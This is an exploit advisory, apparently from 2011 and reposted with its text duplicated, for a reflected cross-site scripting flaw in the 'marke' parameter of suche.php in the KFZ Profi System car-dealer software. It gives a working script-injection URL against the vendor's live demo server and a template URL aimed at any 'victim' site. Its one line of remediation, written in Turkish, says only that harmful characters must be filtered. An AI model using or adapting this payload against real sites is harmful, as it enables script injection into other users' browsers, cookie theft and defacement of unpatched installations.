endLesS
Webmaster
< ------------------- header data start ------------------- >
# Exploit Title: KFZ Profi System XSS Vuln.
# Author: Lynch ~ Bug Researchers
# Date: 11.09.2011
# Demo: http://www.media-products-demoserver.de/ph199/suche.php?marke=>**********alert(document.domain)</script>
# Software Link: http://www.media-products.de/kfz-markt-profi-power-system-p-376.html
# Fixed: Zararlı Karakterler Filitrelenmelidir.
< -- bug code start -- >
http://victim/suche.php?marke=XSSAttack]
< -- bug code end of -- >
< ------------------- header data end of ------------------->
# Exploit Title: KFZ Profi System XSS Vuln.
# Author: Lynch ~ Bug Researchers
# Date: 11.09.2011
# Demo: http://www.media-products-demoserver.de/ph199/suche.php?marke=>**********alert(document.domain)</script>
# Software Link: http://www.media-products.de/kfz-markt-profi-power-system-p-376.html
# Fixed: Zararlı Karakterler Filitrelenmelidir.
< -- bug code start -- >
http://victim/suche.php?marke=XSSAttack]
< -- bug code end of -- >
< ------------------- header data end of ------------------->